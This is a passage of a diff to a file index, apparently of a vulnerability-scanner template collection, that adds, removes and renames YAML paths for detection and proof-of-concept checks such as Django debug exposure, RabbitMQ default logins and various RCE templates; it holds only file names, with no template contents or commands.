./poc/php/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml ./poc/php/wp-php-widget.yaml -./poc/php/wp-phpfreechat-xss-11524.yaml ./poc/php/wp-phpfreechat-xss-11526.yaml ./poc/php/wp-phpfreechat-xss-11527.yaml ./poc/php/wp-phpfreechat-xss-11528.yaml 
@@ -82942,13 +82919,14 @@ ./poc/python/Django-DebugMode.yaml ./poc/python/autobahn-python-detect-592.yaml ./poc/python/autobahn-python-detect-593.yaml -./poc/python/autobahn-python-detect-595.yaml +./poc/python/autobahn-python-detect-594.yaml ./poc/python/default-django-page-6840.yaml ./poc/python/default-django-page-6841.yaml ./poc/python/default-django-page-6842.yaml ./poc/python/default-django-page-6843.yaml ./poc/python/django-admin-panel-7021.yaml ./poc/python/django-admin-panel-7022.yaml +./poc/python/django-admin-panel-7023.yaml ./poc/python/django-admin-panel.yaml ./poc/python/django-debug-detect-7024.yaml ./poc/python/django-debug-detect-7025.yaml @@ -82956,6 +82934,7 @@ ./poc/python/django-debug-detect.yaml ./poc/python/django-debug-enable.yaml ./poc/python/django-debug-enabled.yaml +./poc/python/django-debug-exposed-404.yaml ./poc/python/django-debug-exposure-7028.yaml ./poc/python/django-debug-exposure-7029.yaml ./poc/python/django-debug-exposure-7030.yaml @@ -82969,15 +82948,13 @@ ./poc/python/django-directory-traversal.yaml ./poc/python/django-framework-exceptions-7033.yaml ./poc/python/django-framework-exceptions-7034.yaml -./poc/python/django-framework-exceptions.yaml ./poc/python/django-rest-framework.yaml -./poc/python/django-secret-key.yaml +./poc/python/django-secret.key.yaml ./poc/python/django-variables-exposed.yaml ./poc/python/django.yaml ./poc/python/djangodebug.yaml ./poc/python/flask-redis-docker.yaml ./poc/python/flask-werkzeug-debug.yaml -./poc/python/jupyter-ipython-unauth-8402.yaml ./poc/python/jupyter-ipython-unauth-8404.yaml ./poc/python/jupyter-ipython-unauth-8405.yaml ./poc/python/jupyter-ipython-unauth.yaml 
@@ -82985,16 +82962,15 @@ ./poc/python/python-metrics-9745.yaml ./poc/python/python-metrics-9746.yaml ./poc/python/python-metrics-9747.yaml -./poc/python/python-metrics.yaml ./poc/python/python-phish.yaml -./poc/python/python-scanner.yaml +./poc/python/python-scanner-9748.yaml ./poc/rabbitmq/rabbitmq-config-exposure.yml -./poc/rabbitmq/rabbitmq-dashboard-9776.yaml ./poc/rabbitmq/rabbitmq-dashboard-9777.yaml ./poc/rabbitmq/rabbitmq-dashboard-9778.yaml +./poc/rabbitmq/rabbitmq-dashboard-9779.yaml ./poc/rabbitmq/rabbitmq-dashboard.yaml +./poc/rabbitmq/rabbitmq-default-admin-9780.yaml ./poc/rabbitmq/rabbitmq-default-admin-9781.yaml -./poc/rabbitmq/rabbitmq-default-admin-9782.yaml ./poc/rabbitmq/rabbitmq-default-admin.yaml ./poc/rabbitmq/rabbitmq-default-login-9783.yaml ./poc/rabbitmq/rabbitmq-default-login-9784.yaml @@ -83012,6 +82988,7 @@ ./poc/redis/exposed-redis-7336.yaml ./poc/redis/exposed-redis-7337.yaml ./poc/redis/exposed-redis-7338.yaml +./poc/redis/exposed-redis-7339.yaml ./poc/redis/exposed-redis.yaml ./poc/redis/flask-redis-docker.yaml ./poc/redis/misconfigured-redis.yaml 
@@ -83218,18 +83195,17 @@ ./poc/remote_code_execution/apache-druid-kafka-connect-rce.yaml ./poc/remote_code_execution/apache-filename-brute-force-353.yaml ./poc/remote_code_execution/apache-filename-brute-force.yaml -./poc/remote_code_execution/apache-flink-unauth-rce-355.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-356.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-357.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-358.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-359.yaml ./poc/remote_code_execution/apache-flink-upload-rce.yml ./poc/remote_code_execution/apache-httpd-cve-2021-41773-rce.yml -./poc/remote_code_execution/apache-httpd-rce-362.yaml ./poc/remote_code_execution/apache-httpd-rce-363.yaml ./poc/remote_code_execution/apache-httpd-rce.yaml ./poc/remote_code_execution/apache-ofbiz-log4j-rce-366.yaml ./poc/remote_code_execution/apache-solr-91-rce.yaml +./poc/remote_code_execution/apache-solr-log4j-rce-372.yaml ./poc/remote_code_execution/apache-solr-log4j-rce.yaml ./poc/remote_code_execution/apache-solr-rce.yaml ./poc/remote_code_execution/apache-spark-rce.yaml @@ -83386,7 +83362,7 @@ ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-5989797b3de4a7d046b22faa41f147a5.yaml ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce.yaml -./poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml +./poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml ./poc/remote_code_execution/cisco-rv-series-rce.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-450f3fa1fdfaa0d436f04229a0397315.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -83410,8 +83386,8 @@ ./poc/remote_code_execution/co2ok-for-woocommerce-plugin.yaml ./poc/remote_code_execution/co2ok-for-woocommerce.yaml ./poc/remote_code_execution/code42-log4j-rce-1130.yaml -./poc/remote_code_execution/code42-log4j-rce-1131.yaml ./poc/remote_code_execution/code42-log4j-rce-1132.yaml +./poc/remote_code_execution/code42-log4j-rce.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-0524990b8a93f2e726c050d49aa0b22e.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-3574e2251d76d53bdcc685462fdb0300.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -83442,10 +83418,10 @@ ./poc/remote_code_execution/consul-rexec-rce.yml ./poc/remote_code_execution/consul-service-rce.yaml ./poc/remote_code_execution/consul-service-rce.yml -./poc/remote_code_execution/core-chuangtian-cloud-rce-1207.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1208.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1209.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1210.yaml +./poc/remote_code_execution/core-chuangtian-cloud-rce-1211.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1212.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce.yaml ./poc/remote_code_execution/cost-of-goods-for-woocommerce-29aeaa3c6bb2e136205e4a60d94d44f4.yaml 
@@ -83682,8 +83658,8 @@ ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic-plugin.yaml ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic.yaml -./poc/remote_code_execution/elex-woocommerce-xss-7199.yaml ./poc/remote_code_execution/elex-woocommerce-xss-7200.yaml +./poc/remote_code_execution/elex-woocommerce-xss.yaml ./poc/remote_code_execution/elfinder-rce.yaml ./poc/remote_code_execution/email-customizer-for-woocommerce-2a0fbc617737467a0c1230deb2588849.yaml ./poc/remote_code_execution/email-customizer-for-woocommerce.yaml @@ -83751,7 +83727,9 @@ ./poc/remote_code_execution/extra-product-options-for-woocommerce.yaml ./poc/remote_code_execution/eyou-email-rce-7378.yaml ./poc/remote_code_execution/eyou-email-rce-7379.yaml +./poc/remote_code_execution/eyou-email-rce-7380.yaml ./poc/remote_code_execution/eyou-email-rce-7381.yaml +./poc/remote_code_execution/eyou-email-rce-7382.yaml ./poc/remote_code_execution/eyou-email-rce.yaml ./poc/remote_code_execution/eyou-mail-moni-detail-rce.yaml ./poc/remote_code_execution/f5-tmui-cve-2020-5902-rce.yml 
@@ -83768,19 +83746,21 @@ ./poc/remote_code_execution/fastjson-1-2-24-rce-1.yaml ./poc/remote_code_execution/fastjson-1-2-24-rce-2.yaml ./poc/remote_code_execution/fastjson-1-2-24-rce-7400.yaml -./poc/remote_code_execution/fastjson-1-2-24-rce.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7401.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7403.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7404.yaml +./poc/remote_code_execution/fastjson-1-2-41-rce.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7405.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7407.yaml -./poc/remote_code_execution/fastjson-1-2-42-rce.yaml +./poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml ./poc/remote_code_execution/fastjson-1-2-43-rce-7409.yaml ./poc/remote_code_execution/fastjson-1-2-43-rce-7411.yaml +./poc/remote_code_execution/fastjson-1-2-43-rce-7412.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7413.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7415.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7416.yaml ./poc/remote_code_execution/fastjson-1-2-62-rce-7417.yaml +./poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml ./poc/remote_code_execution/fastjson-1-2-62-rce-7420.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce-7421.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce-7423.yaml @@ -83936,7 +83916,6 @@ ./poc/remote_code_execution/icewarp-webclient-rce-8130.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8131.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8132.yaml -./poc/remote_code_execution/icewarp-webclient-rce-8133.yaml ./poc/remote_code_execution/image-source-control-isc-1f038aef0dcbd62c1999c43ff0e6ea69.yaml ./poc/remote_code_execution/image-source-control-isc-1f88dbd2b9c2d6237e296e8c6c1659c5.yaml ./poc/remote_code_execution/image-source-control-isc.yaml 
@@ -83959,7 +83938,7 @@ ./poc/remote_code_execution/jamf-log4j-jndi-rce-8211.yaml ./poc/remote_code_execution/jamf-log4j-jndi-rce-8212.yaml ./poc/remote_code_execution/jamf-log4j-jndi-rce-8213.yaml -./poc/remote_code_execution/jamf-log4j-jndi-rce.yaml +./poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml ./poc/remote_code_execution/jazzcash-woocommerce-gateway-2b946216639ed77b4eb9e56a3219058b.yaml ./poc/remote_code_execution/jazzcash-woocommerce-gateway.yaml ./poc/remote_code_execution/jeewms-dynamicDataSourceController-rce.yaml @@ -84054,8 +84033,8 @@ ./poc/remote_code_execution/lotapp-rce.yaml ./poc/remote_code_execution/lotuscms-rce-1.yaml ./poc/remote_code_execution/lotuscms-rce-2.yaml -./poc/remote_code_execution/lotuscms-rce-8650.yaml ./poc/remote_code_execution/lotuscms-rce-8651.yaml +./poc/remote_code_execution/lotuscms-rce-8652.yaml ./poc/remote_code_execution/lotuscms-rce-8653.yaml ./poc/remote_code_execution/maccms-rce.yaml ./poc/remote_code_execution/maccms-rce.yml @@ -84082,6 +84061,7 @@ ./poc/remote_code_execution/metersphere-plugin-rce-8835.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8836.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8837.yaml +./poc/remote_code_execution/metersphere-plugin-rce.yaml ./poc/remote_code_execution/mgb-opensource-guestbook.yaml ./poc/remote_code_execution/microblogrce.yaml ./poc/remote_code_execution/min-and-max-purchase-for-woocommerce-29c59921f159dd1fd640d027a39c2496.yaml @@ -84092,7 +84072,6 @@ ./poc/remote_code_execution/minmax-quantity-for-woocommerce.yaml ./poc/remote_code_execution/mirai-unknown-rce-8897.yaml ./poc/remote_code_execution/mirai-unknown-rce-8898.yaml -./poc/remote_code_execution/mirai-unknown-rce-8899.yaml ./poc/remote_code_execution/mobile-login-woocommerce-23d0bf81c74275c3e55e25a6c8aa8e5b.yaml ./poc/remote_code_execution/mobile-login-woocommerce-71c68dc9d2433d718771a35db7cc14f9.yaml ./poc/remote_code_execution/mobile-login-woocommerce-776ff600825d9dc7d0f61014766c27a4.yaml 
@@ -84183,7 +84162,6 @@ ./poc/remote_code_execution/ns-woocommerce-watermark-f2c10bb888c008fbd876fd44d534b759.yaml ./poc/remote_code_execution/ns-woocommerce-watermark.yaml ./poc/remote_code_execution/nsfocus-sas-rce-exec.yaml -./poc/remote_code_execution/nuuo-nvrmini2-rce-9170.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9172.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9173.yaml @@ -84199,6 +84177,7 @@ ./poc/remote_code_execution/opentsdb-rce-2.yaml ./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9341.yaml ./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9342.yaml +./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml ./poc/remote_code_execution/oracle-commerce-cloud.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-cb43a3033745f9235059b7d1b7a3d855.yaml @@ -84238,6 +84217,7 @@ ./poc/remote_code_execution/out-of-stock-display-for-woocommerce.yaml ./poc/remote_code_execution/pagination-styler-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml ./poc/remote_code_execution/pagination-styler-for-woocommerce.yaml +./poc/remote_code_execution/panabit-sy_addmount-rce.yaml ./poc/remote_code_execution/pandorafms-cve-2019-20224-rce.yml ./poc/remote_code_execution/parcel-tracker-ecourier-102353dc8e1f02661d6e7f970ee16c34.yaml ./poc/remote_code_execution/parcel-tracker-ecourier-1fbda1a354e4e1e6f5f905808cc4736f.yaml 
@@ -84278,8 +84258,8 @@ ./poc/remote_code_execution/pbootcms-v3.1.2-rce.yaml ./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce-9d530be5fa0db61096efe68f160be112.yaml ./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce.yaml +./poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce-9471.yaml -./poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce.yaml ./poc/remote_code_execution/perfect-woocommerce-brands-7f5741480217fb4df85d3b4de3f502cb.yaml ./poc/remote_code_execution/perfect-woocommerce-brands-e32d6103a8131017699f2d0178c74f2a.yaml @@ -84298,9 +84278,8 @@ ./poc/remote_code_execution/personalize-woocommerce-cart-page.yaml ./poc/remote_code_execution/pgsql-extensions-rce.yaml ./poc/remote_code_execution/phalcon-framework-source-9493.yaml +./poc/remote_code_execution/phalcon-framework-source-9494.yaml ./poc/remote_code_execution/phalcon-framework-source-9495.yaml -./poc/remote_code_execution/phalcon-framework-source-9496.yaml -./poc/remote_code_execution/phalcon-framework-source.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-5f600e44d5a9bae2880bbdac987c18c0.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-754324d17136d5a0b95bd48018ce3ad6.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-a18b8eeee685e84b7ab5bc1637d15598.yaml 
@@ -84310,11 +84289,10 @@ ./poc/remote_code_execution/phone-orders-for-woocommerce-plugin.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce.yaml ./poc/remote_code_execution/php-8.1.0-dev-rce-sqli.yaml -./poc/remote_code_execution/php-zerodium-backdoor-rce-9569.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9570.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9571.yaml +./poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9573.yaml -./poc/remote_code_execution/php-zerodium-backdoor-rce.yaml ./poc/remote_code_execution/phprce.yaml ./poc/remote_code_execution/phpstudy-backdoor-rce.yaml ./poc/remote_code_execution/phpstudy-backdoor-rce.yml @@ -84332,8 +84310,10 @@ ./poc/remote_code_execution/portugal-ctt-tracking-woocommerce.yaml ./poc/remote_code_execution/powercreator-cms-rce-9643.yaml ./poc/remote_code_execution/powercreator-cms-rce-9644.yaml +./poc/remote_code_execution/powercreator-cms-rce-9645.yaml ./poc/remote_code_execution/powercreator-cms-rce-9646.yaml ./poc/remote_code_execution/powercreator-cms-rce-9647.yaml +./poc/remote_code_execution/powercreator-cms-rce.yaml ./poc/remote_code_execution/pre-orders-for-woocommerce-687db182b0c9655d84523f55416267f1.yaml ./poc/remote_code_execution/pre-orders-for-woocommerce.yaml ./poc/remote_code_execution/premmerce-05c315c45c3d1e8458984521e6889db5.yaml 
@@ -84476,8 +84456,10 @@ ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9755.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9756.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9757.yaml +./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9758.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9759.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9760.yaml +./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml ./poc/remote_code_execution/qianxin-secgate3600-syshandupfile-upload-rce.yaml ./poc/remote_code_execution/qilin-bastion-host-rce.yaml ./poc/remote_code_execution/qilin-bastion-host-rce.yml @@ -84583,7 +84565,6 @@ ./poc/remote_code_execution/salesforce-aura-9984.yaml ./poc/remote_code_execution/salesforce-aura-detect.yml ./poc/remote_code_execution/salesforce-aura-misconfig.yaml -./poc/remote_code_execution/salesforce-aura.yaml ./poc/remote_code_execution/salesforce-credentials-detect.yml ./poc/remote_code_execution/salesforce-login.yaml ./poc/remote_code_execution/salesforce-misconfiguration.yaml @@ -84605,6 +84586,7 @@ ./poc/remote_code_execution/sangfor-ad-login-rce.yaml ./poc/remote_code_execution/sangfor-ad-rce.yaml ./poc/remote_code_execution/sangfor-ba-rce(1).yaml +./poc/remote_code_execution/sangfor-ba-rce-10020.yaml ./poc/remote_code_execution/sangfor-ba-rce-10021.yaml ./poc/remote_code_execution/sangfor-ba-rce.yml ./poc/remote_code_execution/sangfor-cphp-rce.yaml @@ -84634,6 +84616,7 @@ ./poc/remote_code_execution/seacms-before-v992-rce.yaml ./poc/remote_code_execution/seacms-before-v992-rce.yml ./poc/remote_code_execution/seacms-rce-10100.yaml +./poc/remote_code_execution/seacms-rce-10101.yaml ./poc/remote_code_execution/seacms-rce-10102.yaml ./poc/remote_code_execution/seacms-rce.yml ./poc/remote_code_execution/seacms-v654-rce.yaml 
@@ -84668,6 +84651,7 @@ ./poc/remote_code_execution/shop-as-a-customer-for-woocommerce.yaml ./poc/remote_code_execution/showdoc-file-upload-rce-10225.yaml ./poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml +./poc/remote_code_execution/showdoc-file-upload-rce-10227.yaml ./poc/remote_code_execution/showdoc-file-upload-rce-10228.yaml ./poc/remote_code_execution/showdoc-file-upload-rce.yaml ./poc/remote_code_execution/side-cart-woocommerce-2b1e94ad1063793b918ab053345de198.yaml @@ -84676,7 +84660,7 @@ ./poc/remote_code_execution/side-cart-woocommerce.yaml ./poc/remote_code_execution/simple-e-commerce-shopping-cart-7e2981ed79fe5531ebd17112083654eb.yaml ./poc/remote_code_execution/simple-e-commerce-shopping-cart.yaml -./poc/remote_code_execution/simple-employee-rce-10280.yaml +./poc/remote_code_execution/simple-employee-rce-10279.yaml ./poc/remote_code_execution/simple-employee-rce.yaml ./poc/remote_code_execution/simple-woocommerce-csv-loader-ad18054d9efe7d6c6e0c45866e8bcf30.yaml ./poc/remote_code_execution/simple-woocommerce-csv-loader.yaml 
@@ -84722,14 +84706,15 @@ ./poc/remote_code_execution/splash-popup-for-woocommerce.yaml ./poc/remote_code_execution/spon-ip-intercom-ping-rce.yaml ./poc/remote_code_execution/spon-ip-intercom-ping-rce.yml -./poc/remote_code_execution/spon-ip-rce.yaml +./poc/remote_code_execution/spon-ip-rce(1).yaml +./poc/remote_code_execution/sponip-network-system-ping-rce-10421.yaml ./poc/remote_code_execution/sponip-network-system-ping-rce-10422.yaml ./poc/remote_code_execution/sponip-network-system-ping-rce-10423.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10454.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10455.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10456.yaml -./poc/remote_code_execution/springboot-h2-db-rce-10457.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10458.yaml +./poc/remote_code_execution/springboot-h2-db-rce.yaml ./poc/remote_code_execution/springboot-log4j-rce-10472.yaml ./poc/remote_code_execution/springboot-log4j-rce-10473.yaml ./poc/remote_code_execution/springboot-log4j-rce-10474.yaml @@ -84809,7 +84794,6 @@ ./poc/remote_code_execution/tamronos-iptv-rce.yml ./poc/remote_code_execution/tamronos-rce-10647.yaml ./poc/remote_code_execution/tamronos-rce-10648.yaml -./poc/remote_code_execution/tamronos-rce-10649.yaml ./poc/remote_code_execution/tamronos-rce-10650.yaml ./poc/remote_code_execution/tamronos-rce-10651.yaml ./poc/remote_code_execution/terms-and-conditions-popup-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml 
@@ -84824,18 +84808,17 @@ ./poc/remote_code_execution/thinkcmf-rce.yaml ./poc/remote_code_execution/thinkphp-2-rce-10738.yaml ./poc/remote_code_execution/thinkphp-2-rce-10739.yaml -./poc/remote_code_execution/thinkphp-2-rce-10740.yaml ./poc/remote_code_execution/thinkphp-2-rce-10741.yaml ./poc/remote_code_execution/thinkphp-30-rce.yaml ./poc/remote_code_execution/thinkphp-50-rce.yaml ./poc/remote_code_execution/thinkphp-501-rce-10742.yaml -./poc/remote_code_execution/thinkphp-501-rce-10743.yaml +./poc/remote_code_execution/thinkphp-501-rce.yaml ./poc/remote_code_execution/thinkphp-5010-rce.yaml ./poc/remote_code_execution/thinkphp-5022-5129-rce.yaml +./poc/remote_code_execution/thinkphp-5022-rce-10744.yaml ./poc/remote_code_execution/thinkphp-5022-rce-10745.yaml ./poc/remote_code_execution/thinkphp-5022-rce-10746.yaml -./poc/remote_code_execution/thinkphp-5022-rce.yaml -./poc/remote_code_execution/thinkphp-5023-rce-10748.yaml +./poc/remote_code_execution/thinkphp-5022-rce-10747.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10749.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10750.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10751.yaml 
@@ -84905,12 +84888,13 @@ ./poc/remote_code_execution/users-customers-import-export-for-wp-woocommerce.yaml ./poc/remote_code_execution/vcenter-rce.yaml ./poc/remote_code_execution/vercel-detect.yaml -./poc/remote_code_execution/vercel-takeover-11001.yaml +./poc/remote_code_execution/vercel-takeover-11000.yaml ./poc/remote_code_execution/vercel-takeover.yaml ./poc/remote_code_execution/visual-tools-dvr-rce-11031.yaml ./poc/remote_code_execution/visual-tools-dvr-rce-11032.yaml ./poc/remote_code_execution/visual-tools-dvr-rce.yaml ./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce-11034.yaml +./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce.yaml ./poc/remote_code_execution/vmware-horizon-log4j-rce.yaml ./poc/remote_code_execution/vmware-vcenter-cve-2021-21985-rce.yml ./poc/remote_code_execution/vmware-vcenter-log4j-jndi-rce-11050.yaml @@ -84946,10 +84930,10 @@ ./poc/remote_code_execution/webappick-product-feed-for-woocommerce.yaml ./poc/remote_code_execution/webmin-cve-2019-15107-rce.yml ./poc/remote_code_execution/webpack-sourcemap.yaml -./poc/remote_code_execution/webui-rce-11170.yaml ./poc/remote_code_execution/webui-rce-11171.yaml ./poc/remote_code_execution/webui-rce-11172.yaml ./poc/remote_code_execution/webui-rce-11173.yaml +./poc/remote_code_execution/webui-rce-11174.yaml ./poc/remote_code_execution/webui-rce.yaml ./poc/remote_code_execution/weight-based-shipping-for-woocommerce-03810ee843c54e70aa66a159f989ab60.yaml ./poc/remote_code_execution/weight-based-shipping-for-woocommerce.yaml 
@@ -85710,13 +85694,12 @@ ./poc/remote_code_execution/wordpress-rce-simplefilelist.yaml ./poc/remote_code_execution/wordpress-simplefilelist-rce.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11338.yaml -./poc/remote_code_execution/wordpress-woocommerce-listing-11339.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11340.yaml +./poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-1.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11342.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11343.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11344.yaml -./poc/remote_code_execution/wordpress-woocommerce-sqli-11345.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-2.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli.yaml ./poc/remote_code_execution/wordpress-xmlrpc-brute-force.yaml @@ -85773,6 +85756,7 @@ ./poc/remote_code_execution/wp-ecommerce-shop-styling.yaml ./poc/remote_code_execution/wp-force-ssl-535af98dd21b180aed9353b26ab61bf4.yaml ./poc/remote_code_execution/wp-force-ssl-8016151e9aade43a962c06ab9c46dfaf.yaml +./poc/remote_code_execution/wp-force-ssl.yaml ./poc/remote_code_execution/wp-graphql-woocommerce-5e48b1d9464c6954c7f09642fd0e35aa.yaml ./poc/remote_code_execution/wp-graphql-woocommerce.yaml ./poc/remote_code_execution/wp-hubspot-woocommerce-5ea745cbaec9e5a0599bde7b2e42faf2.yaml 
@@ -85796,8 +85780,8 @@ ./poc/remote_code_execution/wp-woocommerce-email-verification-11618.yaml ./poc/remote_code_execution/wp-woocommerce-email-verification-11619.yaml ./poc/remote_code_execution/wp-woocommerce-email-verification-2.yaml +./poc/remote_code_execution/wp-woocommerce-file-download-11620.yaml ./poc/remote_code_execution/wp-woocommerce-file-download-11621.yaml -./poc/remote_code_execution/wp-woocommerce-file-download.yaml ./poc/remote_code_execution/wp-woocommerce-pdf-invoice-listing-11622.yaml ./poc/remote_code_execution/wp-woocommerce-quickbooks-24e0b26c242968cb290b2a8bf1d68029.yaml ./poc/remote_code_execution/wp-woocommerce-quickbooks-95df688c610b5a94c1c10c8d8b9ac0d6.yaml @@ -85813,6 +85797,7 @@ ./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml ./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce.yaml ./poc/remote_code_execution/yapi-rce-11724.yaml +./poc/remote_code_execution/yapi-rce-11725.yaml ./poc/remote_code_execution/yapi-rce-11726.yaml ./poc/remote_code_execution/yapi-rce.yml ./poc/remote_code_execution/yarn-resourcemanager-rce-11734.yaml @@ -86165,11 +86150,11 @@ ./poc/ruby/rails-database-config-9803.yaml ./poc/ruby/rails-database-config-9804.yaml ./poc/ruby/rails-debug-mode-9805.yaml -./poc/ruby/rails-debug-mode-9807.yaml +./poc/ruby/rails-debug-mode-9806.yaml ./poc/ruby/rails-debug-mode.yaml ./poc/ruby/rails-routes-exposed.yaml ./poc/ruby/rails-secret-token-disclosure-9808.yaml -./poc/ruby/rails-secret-token-disclosure-9809.yaml +./poc/ruby/rails-secret-token-disclosure-9810.yaml ./poc/ruby/rails-secret-token-disclosure.yaml ./poc/ruby/rails-secret-token.yaml ./poc/ruby/rails6-xss-9797.yaml 
@@ -86188,7 +86173,7 @@ ./poc/ruby/xss-rails-post.yaml ./poc/samba/samba-config-9985.yaml ./poc/samba/samba-config-9986.yaml -./poc/samba/samba-config-9987.yaml +./poc/samba/samba-config.yaml ./poc/samba/samba-detect-9988.yaml ./poc/samba/samba-detect-9990.yaml ./poc/samba/samba-detect.yaml @@ -86239,12 +86224,11 @@ ./poc/sap/sap-netweaver-detect-10043.yaml ./poc/sap/sap-netweaver-detect-10044.yaml ./poc/sap/sap-netweaver-detect-10046.yaml -./poc/sap/sap-netweaver-detect-10047.yaml ./poc/sap/sap-netweaver-detect-10048.yaml ./poc/sap/sap-netweaver-detect.yaml ./poc/sap/sap-netweaver-info-leak-10049.yaml ./poc/sap/sap-netweaver-info-leak-10050.yaml -./poc/sap/sap-netweaver-info-leak-10052.yaml +./poc/sap/sap-netweaver-info-leak-10051.yaml ./poc/sap/sap-netweaver-info-leak.yaml ./poc/sap/sap-netweaver-portal-10053.yaml ./poc/sap/sap-netweaver-portal-10054.yaml @@ -86253,7 +86237,6 @@ ./poc/sap/sap-netweaver-webgui-10056.yaml ./poc/sap/sap-netweaver-webgui-10057.yaml ./poc/sap/sap-netweaver-webgui-10059.yaml -./poc/sap/sap-netweaver-webgui.yaml ./poc/sap/sap-netweaver-workflow-10060.yaml ./poc/sap/sap-netweaver-workflow-10061.yaml ./poc/sap/sap-netweaver-workflow.yaml @@ -86262,13 +86245,11 @@ ./poc/sap/sap-nw-abap-webgui.yaml ./poc/sap/sap-nw-abap.yaml ./poc/sap/sap-recon-detect-10062.yaml -./poc/sap/sap-recon-detect-10063.yaml ./poc/sap/sap-recon-detect.yaml ./poc/sap/sap-redirect-10064.yaml ./poc/sap/sap-redirect-10065.yaml ./poc/sap/sap-redirect-10066.yaml ./poc/sap/sap-redirect-10067.yaml -./poc/sap/sap-redirect.yaml ./poc/sap/sap-router-info-leak.yaml ./poc/sap/sap-router.yaml 